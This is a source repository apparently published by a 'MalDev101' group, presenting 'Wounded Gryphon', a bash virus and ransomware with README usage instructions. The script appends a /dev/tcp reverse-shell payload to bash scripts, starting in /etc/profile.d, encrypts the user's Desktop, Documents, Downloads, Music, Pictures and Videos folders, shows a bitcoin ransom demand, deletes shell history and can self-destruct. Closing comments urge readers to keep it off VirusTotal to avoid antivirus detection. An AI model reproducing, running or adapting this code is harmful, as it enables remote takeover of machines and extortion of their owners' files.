├── requirements.txt ├── _config.yml ├── LICENSE ├── README.md └── WoundedGryphon.sh /requirements.txt: -------------------------------------------------------------------------------- 1 | ccrypt 2 | -------------------------------------------------------------------------------- /_config.yml: -------------------------------------------------------------------------------- 1 | theme: jekyll-theme-hacker -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 Don Corleone 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Wounded-Gryphon 2 | 3 | [![Contributions Welcome](https://img.shields.io/badge/contributions-welcome-red.svg?style=round)](https://github.com/MalDev101/WoundedGryphon/issues/) 4 | [![GitHub stars](https://img.shields.io/github/stars/MalDev101/WoundedGryphon.svg?style=social&label=Star&maxAge=2592000)](https://github.com/MalDev101/WoundedGryphon/stargazers) 5 | 6 | 7 | A virus/ransomware written in bash by @Da2dalus. 8 | 9 | ## Run 10 | 11 | *sudo chmod 755 WoundedGryphon.sh* 12 | 13 | *sudo ./WoundedGryphon.sh [option]* 14 | 15 | ## Options 16 | 17 | *Show help page: --help* 18 | 19 | 20 | *Infect all bash files on the system: --infect* 21 | 22 | 23 | *Encrypt files in Desktop, Videos ...: --encrypt* 24 | 25 | 26 | *Self destruct when done: (--infect, --encrypt) --self-destruct* 27 | 28 | *Unencrypt files: --unencrypt* 29 | 30 | 31 | *Uninfect system: --uninfect* 32 | 33 | *Show random banner: --banner* 34 | 35 | ## Checklist 36 | 37 | * [x] Encrypt files 38 | * [x] Banner function 39 | * [x] Infect bash files 40 | * [ ] Infect python files 41 | * [ ] Infect ELF files 42 | * [x] Self destruct option 43 | * [x] Color output 44 | * [x] Unencrypt and uninfect command 45 | -------------------------------------------------------------------------------- /WoundedGryphon.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # # 4 | # __ __ \ .___ .___ 5 | # / \ / \____ \_ __ ____ __| _/____ __| _/ --------- 6 | # \ \/\/ / _ \| | \/ \ / __ _/ __ \ / __ | ----------- 7 | # \ ( <_> | | | | / /_/ \ ___// /_/ | ------------ 8 | # \__/\ / \____/|____/|___| \____ |\___ \____ | ----------- 9 | # _____\/ \/ __ \/ \/ \/ ---------- 10 | # / ___ \_______ ___.________ | |__ ____ ____ --------- 11 | # / \ __\_ __ < | \____ \| | \ / _ \ / \ ---------- 12 | # \ \_\ | | \/\___ | |_> | Y ( <_> | | \ ---------- 13 | # \______ |__| / ____| __/|___| /\___\/|___| / ---------- 14 | # / \/ \/ |__| \/ \ \/ --------- 15 | # / Wonded Gryphon v4.3 ______----------- # --------------- 16 | # # _______,---'__,---' --------------------------- 17 | # _,-'---_---__,---' ----------------------------- 18 | # /_ # (, ---____', -------------------------------- 19 | # / /,, `, ,-' ------------------------------------- 20 | # ;/) ,',,_/,' # ------------------------------------- 21 | # | /\ ,.'//\ / --------------------------------------- 22 | # `-` \ ,,' /. # ------------------------------------- 23 | # `', ,-- `./ ----------------------------------------- 24 | # '/ / | /`, ----------------------------------------- 25 | # //'',.\_ .\\ -----,{==>- ------------------------------ 26 | # __// __;_`- \ `;.__,;' ------------------------------------ 27 | # ((,--,) (((,------; `--' -------------------------------------- 28 | # 29 | # Created by Da2dalus a MalDev101 project 30 | # This is only an experiment but it can be dangerous. 31 | # I am not responsible for the damage. 32 | # This is a virus/ransomware that works on unix systems with bash installed. 33 | # Tested on Linux (Ubuntu, Debian) 34 | 35 | SHEBANG="#!/bin/bash" 36 | 37 | ME="$0" 38 | 39 | CAT=$(cat "$ME") 40 | 41 | VERSION="v4.3" 42 | 43 | OFLAG="$1" 44 | 45 | # Configuration -------------------------------------------------------------------------------------------------------------# 46 | 47 | # Virus mode configuration ----------------------------------------------------$ 48 | 49 | FLAG="#arrow" 50 | 51 | # ------------------------------------------------------------------> 52 | 53 | # String you want to append to sh file. Example: reverse tcp bash (metasploit). 54 | # Responds to: 55 | # IP: 192.168.1.88 56 | # PORT: 8888 57 | 58 | PAYLOAD="0<&205-;exec 205<>/dev/tcp/192.168.1.88/8888;sh <&205 >&205 2>&205" # Choose payload when infecting 59 | 60 | # -------------------------------------------------------------------> 61 | 62 | MAXINFECTCOUNT=50 # Maximum infected files 63 | 64 | # ------------------------------------------------------------------------------$ 65 | 66 | # Ransomware mode configuration ------------------------------------------------$ 67 | 68 | KEY="GrYpHoN" # KEY 69 | 70 | CCRYPT="/bin/ccrypt" 71 | 72 | # ------------------------------------------------------------------------------$ 73 | 74 | # ----------------------------------------------------------------------------------------------------------------------------# 75 | 76 | # Colors and special caracters 77 | 78 | # Reset 79 | NC='\033[0m' # Text Reset 80 | 81 | BLINK=$(tput blink) 82 | 83 | # Regular Colors 84 | Black='\033[0;30m' # Black 85 | Red='\033[0;31m' # Red 86 | Green='\033[0;32m' # Green 87 | Yellow='\033[0;33m' # Yellow 88 | Blue='\033[0;34m' # Blue 89 | Purple='\033[0;35m' # Purple 90 | Cyan='\033[0;36m' # Cyan 91 | White='\033[0;37m' # White 92 | 93 | # Bold 94 | BBlack='\033[1;30m' # Black 95 | BRed='\033[1;31m' # Red 96 | BGreen='\033[1;32m' # Green 97 | BYellow='\033[1;33m' # Yellow 98 | BBlue='\033[1;34m' # Blue 99 | BPurple='\033[1;35m' # Purple 100 | BCyan='\033[1;36m' # Cyan 101 | BWhite='\033[1;37m' # White 102 | 103 | # Underline 104 | UBlack='\033[4;30m' # Black 105 | URed='\033[4;31m' # Red 106 | UGreen='\033[4;32m' # Green 107 | UYellow='\033[4;33m' # Yellow 108 | UBlue='\033[4;34m' # Blue 109 | UPurple='\033[4;35m' # Purple 110 | UCyan='\033[4;36m' # Cyan 111 | UWhite='\033[4;37m' # White 112 | 113 | # Background 114 | On_Black='\033[40m' # Black 115 | On_Red='\033[41m' # Red 116 | On_Green='\033[42m' # Green 117 | On_Yellow='\033[43m' # Yellow 118 | On_Blue='\033[44m' # Blue 119 | On_Purple='\033[45m' # Purple 120 | On_Cyan='\033[46m' # Cyan 121 | On_White='\033[47m' # White 122 | 123 | # High Intensity 124 | IBlack='\033[0;90m' # Black 125 | IRed='\033[0;91m' # Red 126 | IGreen='\033[0;92m' # Green 127 | IYellow='\033[0;93m' # Yellow 128 | IBlue='\033[0;94m' # Blue 129 | IPurple='\033[0;95m' # Purple 130 | ICyan='\033[0;96m' # Cyan 131 | IWhite='\033[0;97m' # White 132 | 133 | # Bold High Intensity 134 | BIBlack='\033[1;90m' # Black 135 | BIRed='\033[1;91m' # Red 136 | BIGreen='\033[1;92m' # Green 137 | BIYellow='\033[1;93m' # Yellow 138 | BIBlue='\033[1;94m' # Blue 139 | BIPurple='\033[1;95m' # Purple 140 | BICyan='\033[1;96m' # Cyan 141 | BIWhite='\033[1;97m' # White 142 | 143 | # High Intensity backgrounds 144 | On_IBlack='\033[0;100m' # Black 145 | On_IRed='\033[0;101m' # Red 146 | On_IGreen='\033[0;102m' # Green 147 | On_IYellow='\033[0;103m' # Yellow 148 | On_IBlue='\033[0;104m' # Blue 149 | On_IPurple='\033[0;105m' # Purple 150 | On_ICyan='\033[0;106m' # Cyan 151 | On_IWhite='\033[0;107m' # White 152 | 153 | # List made by Shakiba Moshiri 154 | 155 | # All the BANNERS 156 | 157 | function banner1() { 158 | 159 | echo -e "$Blue _ # _ $NC" 160 | echo -e "$Blue _/| \ _ |\_ $NC" 161 | echo -e "$Blue _/_ | \|\\ | _\ $NC" 162 | echo -e "$Blue _/_/| / / \|\ |\_\_ # $NC" 163 | echo -e "$Blue _/_/ |/ / _ \/\| \_\_ / $NC" 164 | echo -e "$Blue _/_/ || | | \*/ || \_\/ $NC" 165 | echo -e "$Blue /_/ | | |\ | \_ / /| | | \_\ # $NC" 166 | echo -e "$Blue // ||| | \_/ \__/ | ||| \\ / $NC" 167 | echo -e "$Blue // __| ||\ \ || || / /|| |__ \/ $NC" 168 | echo -e "$Blue //_/ \|||| \/\\|| ||//\/ ||||/ \_\\ $NC" 169 | echo -e "$Blue /// \\\\/ /() ()\ \//// \\\ $NC" 170 | echo -e "$Blue |/ \/ | | | \/ \| $NC" 171 | echo -e "$Blue /_| | |_ \ # $NC" 172 | echo -e "$Blue ///_| |_||\_ \/ $NC" 173 | echo -e "$Blue |//||/||\/||\/ WOUNDED GRYPHON $VERSION $NC" 174 | echo -e "$Blue / || ||/||/\/ $NC" 175 | echo -e "$Blue {}/|| {} $NC" 176 | echo -e "$Blue || $NC" 177 | echo -e "$Blue () $NC" 178 | } 179 | 180 | function banner2() { 181 | 182 | echo -e "$BLINK $Cyan 183 | ++01100101 01110101++ =ඏ= ++10101110 10100110++ 184 | +011100110110 01001111000 0♢0Ŧ0♢0 00011110010 011011001110+ 185 | +0110010001100101 0110000101100100 000卄000 0010011010000110 1010011000100110+ 186 | +01101101011000010111001001101011++00+0卄00++++11010110010011101000011010110110+ 187 | 0111001101100 0010110111001100100 ⁆⁅ 0010011001110110100 0011011001110 188 | 011001100 110000101110010++= ⁆⁅ =++010011101000011 001100110 189 | +01 10100001100101011 10010ʞk01001 11010100110000101 10+ 190 | +0111010001101111 +01ʞk10+ 1111011000101110+ 191 | +110101011011 00.∴.00 110110101011+ 192 | +01100101 0+1ʞk1+0 10100110+ 193 | +1100101 +0+.∴.+0+ 1010011+ 194 | +1110010 +0+.∴.+0+ 0100111+ 195 | +1110100 01 ∴ 10 0010111+ 196 | 10 ∴ 01 197 | 10 ∵ 01 198 | 00.00 199 | : : $NC 200 | $BBlue Do you got what it takes? $NC 201 | $BWhite https://bit.ly/3b83sD9 $NC" 202 | } 203 | 204 | function banner3() { 205 | echo -e " $Cyan 206 | # ------------------------------------------ 207 | __ __ \ -------------- .___ ------- .___ -------- 208 | / \ / \____ \_ __ ____ __| _/____ __| _/ --------- 209 | \ \/\/ / _ \| | \/ \ / __ _/ __ \ / __ | ----------- 210 | \ ( <_> | | | | / /_/ \ ___// /_/ | ------------ 211 | \__/\ / \____/|____/|___| \____ |\___ \____ | ----------- 212 | _____\/ \/ __ \/ \/ \/ ---------- 213 | / ___ \_______ ___.________ | |__ ____ ____ --------- 214 | / \ __\_ __ < | \____ \| | \ / _ \ / \ ---------- 215 | \ \_\ | | \/\___ | |_> | Y ( <_> | | \ ---------- 216 | \______ |__| / ____| __/|___| /\___\/|___| / ---------- 217 | / \/ \/ |__| \/ \ \/ --------- 218 | /$NC $BBlue Wonded Gryphon $VERSION $NC $Cyan---------------- # --------------- 219 | # ---------------------------------------------------------- $NC" 220 | } 221 | 222 | function banner4() { 223 | echo -e "$Blue 224 | _________ 225 | / ======= \ 226 | / __________\ 227 | | ___________ | 228 | | | I Love | | 229 | | | BASH | | 230 | | |_________| |________________________ 231 | \=____________/ ) 232 | / ........... \ WOUNDED GRYPHON / 233 | / ::::::::::::: \ $VERSION =D-' 234 | (_________________) $NC" 235 | } 236 | 237 | function banner5() { 238 | echo -e "$Red █ █░ ▒█████ █ ██ ███▄ █ ▓█████▄ ▓█████ ▓█████▄ ▄████ ██▀███ ▓██ ██▓ ██▓███ ██░ ██ ▒█████ ███▄ █ $NC"; 239 | echo -e "$Red ▓█░ █ ░█░▒██▒ ██▒ ██ ▓██▒ ██ ▀█ █ ▒██▀ ██▌▓█ ▀ ▒██▀ ██▌ ██▒ ▀█▒▓██ ▒ ██▒▒██ ██▒▓██░ ██▒▓██░ ██▒▒██▒ ██▒ ██ ▀█ █ $NC"; 240 | echo -e "$Red ▒█░ █ ░█ ▒██░ ██▒▓██ ▒██░▓██ ▀█ ██▒░██ █▌▒███ ░██ █▌▒██░▄▄▄░▓██ ░▄█ ▒ ▒██ ██░▓██░ ██▓▒▒██▀▀██░▒██░ ██▒▓██ ▀█ ██▒ $NC"; 241 | echo -e "$Red ░█░ █ ░█ ▒██ ██░▓▓█ ░██░▓██▒ ▐▌██▒░▓█▄ ▌▒▓█ ▄ ░▓█▄ ▌░▓█ ██▓▒██▀▀█▄ ░ ▐██▓░▒██▄█▓▒ ▒░▓█ ░██ ▒██ ██░▓██▒ ▐▌██▒ $NC"; 242 | echo -e "$Red ░░██▒██▓ ░ ████▓▒░▒▒█████▓ ▒██░ ▓██░░▒████▓ ░▒████▒░▒████▓ ░▒▓███▀▒░██▓ ▒██▒ ░ ██▒▓░▒██▒ ░ ░░▓█▒░██▓░ ████▓▒░▒██░ ▓██░ $NC"; 243 | echo -e "$Red ░ ▓░▒ ▒ ░ ▒░▒░▒░ ░▒▓▒ ▒ ▒ ░ ▒░ ▒ ▒ ▒▒▓ ▒ ░░ ▒░ ░ ▒▒▓ ▒ ░▒ ▒ ░ ▒▓ ░▒▓░ ██▒▒▒ ▒▓▒░ ░ ░ ▒ ░░▒░▒░ ▒░▒░▒░ ░ ▒░ ▒ ▒ $NC"; 244 | echo -e "$Red ▒ ░ ░ ░ ▒ ▒░ ░░▒░ ░ ░ ░ ░░ ░ ▒░ ░ ▒ ▒ ░ ░ ░ ░ ▒ ▒ ░ ░ ░▒ ░ ▒░▓██ ░▒░ ░▒ ░ ▒ ░▒░ ░ ░ ▒ ▒░ ░ ░░ ░ ▒░ $NC"; 245 | echo -e "$Red ░ ░ ░ ░ ░ ▒ ░░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░ ▒ ▒ ░░ ░░ ░ ░░ ░░ ░ ░ ▒ ░ ░ ░ $NC"; 246 | echo -e "$Red ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ $NC"; 247 | echo -e "$Red ░ ░ ░ ░ $NC"; 248 | 249 | } 250 | 251 | function banner_text() { 252 | 253 | echo -e " $UBlue 254 | 255 | # Created by Da2dalus a MalDev101 project 256 | # This is only an experiment but it can be dangerous. 257 | # I am not responsible for the damage. 258 | # This is a virus/ransomware that works on unix systems with bash installed. 259 | # Tested on Linux (Ubuntu, Debian) and MacOS (OSX) 260 | # $NC 261 | $BBlue# If virus mode: $NC 262 | $UBlue# 263 | # Check if files are written in bash then start infecting them. 264 | # The virus ignores non bash scripts and already infected files 265 | # $NC 266 | $BBlue# If ransomware mode: $NC 267 | $UBlue# 268 | # Encrypt files in Desktop, Videos ... $NC" 269 | } 270 | 271 | function error() { 272 | 273 | echo -e "$Red $BLINK _______________________________ ________ __________._. $NC" 274 | echo -e "$Red $BLINK \_ _____/\______ \______ \\_____ \\______ \ | $NC" 275 | echo -e "$Red $BLINK | __)_ | _/| _/ / | \| _/ | $NC" 276 | echo -e "$Red $BLINK | \ | | \| | \/ | \ | \\| $NC" 277 | echo -e "$Red $BLINK /_______ / |____|_ /|____|_ /\_______ /____|_ /__ $NC" 278 | echo -e "$Red $BLINK \/ \/ \/ \/ \/ \/ $NC" 279 | 280 | echo -e " " 281 | } 282 | 283 | function helpfunction() { 284 | 285 | echo -e "$BCyan Available opions: $NC" 286 | echo -e " " 287 | echo -e "$UCyan Show this page: --help $NC" 288 | echo -e "$UCyan Infect all bash files on the system: --infect $NC" 289 | echo -e "$UCyan Encrypt files in Desktop, Videos ...: --encrypt $NC" 290 | echo -e "$UCyan Self destruct when done: (--infect, --encrypt) --self-destruct $NC" 291 | echo -e "$UCyan Unencrypt files: --unencrypt $NC" 292 | echo -e "$UCyan Uninfect system: --uninfect $NC" 293 | echo -e "$UCyan Only show random banner: --banner $NC" 294 | 295 | } 296 | 297 | # Cleanup function 298 | 299 | function cleanup() { 300 | 301 | echo "#!/bin/bash" > Gryphon.sh 302 | echo "sleep 8" >> Gryphon.sh 303 | echo "sudo mv $ME /dev/null" >> Gryphon.sh 304 | chmod 755 Gryphon.sh 305 | ./Gryphon 306 | exit 307 | } 308 | 309 | 310 | # Virus mode 311 | 312 | function check() { 313 | 314 | local IFBASH=$(grep -Fx "$SHEBANG" *) 315 | 316 | if [ "$IFBASH" =~ .*"$SHEBANG" ] 317 | 318 | then 319 | 320 | local LISTNOTREADY=$(echo "$IFBASH" | sed 's|:#!/bin/bash||') 321 | local LISTNOTREADYD=$(echo "$LISTNOTREADY" | tr "\n" " ") 322 | local LISTNOTREADY2=$(grep -Fx "$FLAG" "$LISTNOTREADYD") 323 | local LISTNOTREADY2D=$(echo "$LISTNOTREADY2" | sed '/bar/,+1 d') 324 | LIST=$(echo "$LISTNOTREADY2D" | tr "\n" " ") 325 | 326 | if [ "$LIST" == "" ] 327 | 328 | then 329 | 330 | foldercheck 331 | 332 | else 333 | 334 | infect 335 | 336 | fi 337 | 338 | else 339 | 340 | foldercheck 341 | 342 | fi 343 | 344 | } 345 | 346 | function foldercheck() { 347 | 348 | local LDIR=$(ls -d *) 349 | 350 | if [ "$LDIR" == "" ] 351 | 352 | then 353 | cd / 354 | 355 | check 356 | 357 | else 358 | 359 | echo "$LDIR" > LIST.txt 360 | 361 | CDDIR=$(shuf -n1 LIST.txt) 362 | 363 | cd "$CDDIR" 364 | 365 | check 366 | fi 367 | } 368 | 369 | # PAYLOAD 370 | 371 | function infect() { 372 | 373 | # String you want to append to sh file. Example: reverse tcp bash (metasploit). 374 | # Responds to: 375 | # IP: 192.168.1.88 376 | # PORT: 8888 377 | 378 | echo "$PAYLOAD" >> "$LIST" 379 | echo "$FLAG" >> "$LIST" 380 | 381 | INFECTCOUNT=$(($INFECTCOUNT + 1)) 382 | 383 | if [ "$INFECTCOUNT" == "$MAXINFECTCOUNT" ] 384 | 385 | then 386 | if grep -q --self-destruct <<<"$@" 387 | 388 | then 389 | echo -e "$BBlue Done...$NC" 390 | cleanup 391 | 392 | else 393 | echo -e "$BBlue Done...$NC" 394 | exit 395 | 396 | fi 397 | 398 | else 399 | check 400 | 401 | fi 402 | 403 | } 404 | 405 | # choose a random banner 406 | 407 | function CHOOSE_BANNER() { 408 | 409 | banners=(banner1 banner2 banner3 banner4 banner5) ; 410 | THECHOSENONE="${banners[RANDOM%${#banners[@]}]}"; 411 | } 412 | 413 | CHOOSE_BANNER 414 | 415 | function BANNER() { 416 | 417 | "$THECHOSENONE" 418 | echo " " 419 | banner_text 420 | } 421 | 422 | # start infecting autostart 423 | 424 | function virus_start() { 425 | 426 | BANNER # Very important :) 427 | 428 | cd /etc/profile.d/ 429 | 430 | check 431 | 432 | } 433 | 434 | # RANSOMWARE MODE 435 | 436 | function ccryptcheck() { 437 | 438 | if [ -f "$CCRYPT" ] 439 | 440 | then 441 | scan 442 | 443 | else 444 | sudo apt install ccrypt -yy 445 | brew install ccrypt 446 | yum install ccrypt 447 | pacman install ccrypt 448 | ccryptcheck 449 | 450 | fi 451 | } 452 | 453 | function encryptvideos() { 454 | 455 | cd "$HOME" 456 | cd Videos 457 | local LS=$(ls -a) 458 | local LIST=$(echo "$LS" | tr "\n" " ") 459 | ccencrypt "$LIST" -k "$KEY" 460 | for f in *.cpt; do 461 | mv -- "$f" "${f%.cpt}.WOUND" 462 | done 463 | 464 | } 465 | 466 | function encryptdesktop() { 467 | 468 | cd "$HOME" 469 | cd Desktop 470 | local LS=$(ls -a) 471 | local LIST=$(echo "$LS" | tr "\n" " ") 472 | ccencrypt "$LIST" -k "$KEY" 473 | for f in *.cpt; do 474 | mv -- "$f" "${f%.cpt}.WOUND" 475 | done 476 | 477 | } 478 | 479 | function encryptpictures() { 480 | 481 | cd "$HOME" 482 | cd Pictures 483 | local LS=$(ls -a) 484 | local LIST=$(echo "$LS" | tr "\n" " ") 485 | ccencrypt "$LIST" -k "$KEY" 486 | for f in *.cpt; do 487 | mv -- "$f" "${f%.cpt}.WOUND" 488 | done 489 | 490 | } 491 | 492 | function encryptdocuments() { 493 | 494 | cd "$HOME" 495 | cd Documents 496 | local LS=$(ls -a) 497 | local LIST=$(echo "$LS" | tr "\n" " ") 498 | ccencrypt "$LIST" -k "$KEY" 499 | for f in *.cpt; do 500 | mv -- "$f" "${f%.cpt}.WOUND" 501 | done 502 | 503 | } 504 | 505 | function encryptdownloads() { 506 | 507 | cd "$HOME" 508 | cd Downloads 509 | local LS=$(ls -a) 510 | local LIST=$(echo "$LS" | tr "\n" " ") 511 | ccencrypt "$LIST" -k "$KEY" 512 | for f in *.cpt; do 513 | mv -- "$f" "${f%.cpt}.WOUND" 514 | done 515 | 516 | } 517 | 518 | function encryptmusic() { 519 | 520 | cd "$HOME" 521 | cd Music 522 | local LS=$(ls -a) 523 | local LIST=$(echo "$LS" | tr "\n" " ") 524 | ccencrypt "$LIST" -k "$KEY" 525 | for f in *.cpt; do 526 | mv -- "$f" "${f%.cpt}.WOUND" 527 | done 528 | 529 | } 530 | 531 | function ransom_start() { 532 | 533 | BANNER 534 | ccryptcheck 535 | sleep 5 536 | encryptdesktop 537 | sleep 5 538 | encryptdocuments 539 | sleep 5 540 | encryptdownloads 541 | sleep 5 542 | zenity --warning --text="Your files are encrypted by Wounded Gryphon! Pay 500$ worth in bitcoin to this bitcoin address: Your Bitcoin Address so you can receive the decrypt instructions" 543 | encryptmusic 544 | sleep 5 545 | encryptpictures 546 | sleep 5 547 | encryptvideos 548 | cd "$HOME" && rm .bash_history 549 | sleep 5 550 | 551 | if grep -q --self-destruct <<<"$@" 552 | 553 | then 554 | echo -e "$BBlue Done...$NC" 555 | cleanup 556 | 557 | else 558 | echo -e "$BBlue Done...$NC" 559 | exit 560 | 561 | fi 562 | 563 | } 564 | 565 | # Uninfect 566 | 567 | function remcheck() { 568 | 569 | local IFBASH=$(grep -Fx "$SHEBANG" *) 570 | 571 | if grep -q "$SHEBANG" <<<"$IFBASH" 572 | 573 | then 574 | 575 | local LISTNOTREADY=$(echo "$IFBASH" | sed 's|:#!/bin/bash||') 576 | local LISTNOTREADYD=$(echo "$LISTNOTREADY" | tr "\n" " ") 577 | local LISTNOTREADY2=$(grep -Fx "$FLAG" "$LISTNOTREADYD") 578 | local LISTNOTREADY2D=$(echo "$LISTNOTREADY2" | sed 's|:#arrow||') 579 | LIST=$(echo "$LISTNOTREADY2D" | tr "\n" " ") 580 | 581 | if [ "$LIST" == "" ] 582 | 583 | then 584 | 585 | remfoldercheck 586 | 587 | else 588 | 589 | uninfect 590 | 591 | fi 592 | 593 | else 594 | 595 | remfoldercheck 596 | 597 | fi 598 | 599 | } 600 | 601 | function remfoldercheck() { 602 | 603 | local LDIR=$(ls -d *) 604 | 605 | if [ "$LDIR" == "" ] 606 | 607 | then 608 | cd / 609 | 610 | remcheck 611 | 612 | else 613 | 614 | echo "$LDIR" > LIST.txt 615 | 616 | CDDIR=$(shuf -n1 LIST.txt) 617 | 618 | cd "$CDDIR" 619 | 620 | remcheck 621 | fi 622 | } 623 | 624 | 625 | function uninfect() { 626 | 627 | sed -i '/"$PAYLOAD"/d' "$LIST" 628 | sed -i '/"$FLAG"/d' "$LIST" 629 | 630 | RINFECTCOUNT=$(($RINFECTCOUNT + 1)) 631 | 632 | if [ "$RINFECTCOUNT" == $MAXINFECTCOUND ] 633 | 634 | then 635 | 636 | if grep -q --self-destruct <<<"$@" 637 | 638 | then 639 | echo -e "$BBlue Done...$NC" 640 | cleanup 641 | 642 | else 643 | echo -e "$BBlue Done...$NC" 644 | exit 645 | 646 | fi 647 | 648 | else 649 | remcheck 650 | 651 | fi 652 | 653 | } 654 | 655 | function uninfectstart() { 656 | 657 | BANNER # Very important :) 658 | 659 | cd /etc/profile.d/ 660 | 661 | remcheck 662 | 663 | } 664 | 665 | # Unencrypt 666 | 667 | function unencryptvideos() { 668 | 669 | cd "$HOME" 670 | cd Videos 671 | local LS=$(ls -a) 672 | local LIST=$(echo "$LS" | tr "\n" " ") 673 | ccdecrypt "$LIST" -K "$KEY" 674 | } 675 | 676 | function unencryptdesktop() { 677 | 678 | cd "$HOME" 679 | cd Desktop 680 | local LS=$(ls -a) 681 | local LIST=$(echo "$LS" | tr "\n" " ") 682 | ccdecrypt "$LIST" -K "$KEY" 683 | } 684 | 685 | function unencryptpictures() { 686 | 687 | cd "$HOME" 688 | cd Pictures 689 | local LS=$(ls -a) 690 | local LIST=$(echo "$LS" | tr "\n" " ") 691 | ccdecrypt "$LIST" -K "$KEY" 692 | } 693 | 694 | function unencryptdocuments() { 695 | 696 | cd "$HOME" 697 | cd Documents 698 | local LS=$(ls -a) 699 | local LIST=$(echo "$LS" | tr "\n" " ") 700 | ccdecrypt "$LIST" -K "$KEY" 701 | } 702 | 703 | function unencryptdownloads() { 704 | 705 | cd "$HOME" 706 | cd Downloads 707 | local LS=$(ls -a) 708 | local LIST=$(echo "$LS" | tr "\n" " ") 709 | ccdecrypt "$LIST" -K "$KEY" 710 | 711 | } 712 | 713 | function unencryptmusic() { 714 | 715 | cd "$HOME" 716 | cd Music 717 | local LS=$(ls -a) 718 | local LIST=$(echo "$LS" | tr "\n" " ") 719 | ccdecrypt "$LIST" -K "$KEY" 720 | 721 | } 722 | 723 | function unencrypt() { 724 | 725 | BANNER 726 | ccryptcheck 727 | sleep 5 728 | unencryptdesktop 729 | sleep 5 730 | unencryptdocuments 731 | sleep 5 732 | unencryptdownloads 733 | sleep 5 734 | unencryptmusic 735 | sleep 5 736 | unencryptpictures 737 | sleep 5 738 | unencryptvideos 739 | cd "$HOME" && rm .bash_history 740 | sleep 5 741 | 742 | if grep -q --self-destruct <<<"$@" 743 | 744 | then 745 | echo -e "$BBlue Done...$NC" 746 | cleanup 747 | 748 | else 749 | echo -e "$BBlue Done...$NC" 750 | exit 751 | 752 | fi 753 | 754 | } 755 | 756 | # Start 757 | 758 | if [ "$OFLAG" == "--infect" ] 759 | 760 | then 761 | virus_start 762 | 763 | elif [ "$OFLAG" == "--encrypt" ] 764 | 765 | then 766 | ransom_start 767 | 768 | elif [ "$OFLAG" == "--uninfect" ] 769 | 770 | then 771 | uninfect 772 | 773 | elif [ "$OFLAG" == "--help" ] 774 | 775 | then 776 | helpfunction 777 | 778 | elif [ "$OFLAG" == "--unencrypt" ] 779 | 780 | then 781 | unencrypt 782 | 783 | elif [ "$OFLAG" == "--banner" ] 784 | 785 | then 786 | BANNER 787 | 788 | elif [ $# -le 0 ] 789 | 790 | then 791 | error 792 | echo -e " " 793 | echo -e "$Red No arguments specified! $NC" 794 | echo -e "$Red Use$NC $BRed--help$NC $Red to display options.$NC" 795 | 796 | else 797 | error 798 | echo -e " " 799 | echo -e "$Red No such argument available!$NC" 800 | echo -e "$Red Use$NC $BRed--help$NC $Red to display options.$NC" 801 | 802 | fi 803 | 804 | 805 | # |\ /) 806 | # /\_\\__ (_// 807 | # | `>\-` _._ //`) 808 | # \ /` \\ _.-.---.`-._ // 809 | # ` \|` / \ `|/ 810 | # | \.@-@./ | 811 | # |.../`\_/`\...| 812 | # |::// _ \\::| 813 | # | | \ )|_ | 814 | # \/`\_`> <_/ \/ 815 | # \__/'---'\__/ 816 | # `-. ::: .-' 817 | # //`:::`\\ 818 | # // ' \\ 819 | # |/ \\ 820 | # 821 | # PLEASE DO NOT COPY THE SOURCE CODE OF THIS PROJECT AND RENAME IT 822 | # THAT'S NOT CREATING THAT IS STEALING. 823 | # 824 | # THIS SOFTWARE IS PROTECTED BY A GNU PUBLIC LICENSE 825 | # 826 | # DO NOT UPLOAD THIS SAMPLE ON VIRUS TOTAL TO PREVENT 827 | # ANTI VIRUS DETECTION. 828 | # 829 | # I AND THE TEAM ARE NOT RESPONSIBLE FOR THE DAMAGE CAUSED BY 830 | # THIS SOFTWARE! 831 | # 832 | # THANKS FOR THE PEOPLE WHO ADDET THERE CODE TO THIS PROJECT 833 | # AND SUPPORTED IT 834 | # 835 | # NEW VERSIONS WILL BE COMING SOON (I HOPE) 836 | # 837 | # Greetings from the MalDev101 TEAM 838 | --------------------------------------------------------------------------------